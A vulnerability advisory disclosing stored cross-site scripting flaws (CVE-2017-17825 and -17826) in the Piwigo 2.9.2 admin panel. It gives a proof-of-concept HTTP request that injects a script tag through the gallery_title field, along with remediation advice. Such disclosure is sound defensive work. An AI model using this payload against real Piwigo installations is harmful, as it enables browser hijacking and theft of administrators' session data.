CVE-2017-17825 Multiple Stored XSS Vulnerabilities in Piwigo 2.9.2
23 Dec 2017It was identified that admin panel of Piwigo application is vulnerable to multiple Persistent Cross Site Scripting vulnerabilities. An attacker can exploit these vulnerabilities to hijack client’s browser along with the data stored in it.
Affected Version : <=2.9.2
Vulnerable Instances:
- /admin.php?page=batch_manager&mode=unit, [POST] tags-[] [CVE-2017-17825]
- /admin.php?page=configuration§ion=main, [POST] gallery_title [CVE-2017-17826]
Proof of Concept:
Configuration component
REQUEST
POST /piwigo-2.9.2/piwigo/admin.php?page=configuration§ion=main HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo-2.9.2/piwigo/admin.php?page=configuration
Content-Type: application/x-www-form-urlencoded
Content-Length: 310
Cookie: pwg_id=ljmb7f4h6rsrdkv9bgotsl9ja3;
Connection: close
Upgrade-Insecure-Requests: 1
gallery_title=`</title><script>alert(document.domain)</script>`&page_banner=test+banner&order_by%5B%5D=date_available+DESC&order_by%5B%5D=file+ASC&order_by%5B%5D=id+ASC&rate_anonymous=on&allow_user_registration=on&allow_user_customization=on&week_starts_on=monday&history_guest=on&log=on&mail_theme=clear&submit=
RESPONSE
Remediation:
As the application make use of MVC architecture, it is recommended to implement a middleware or centralized controller that uses Context Specific Filtering which sanitizes user input before printing it to user.
Vendor Patches:
The patch released by vendor for this issue can be found here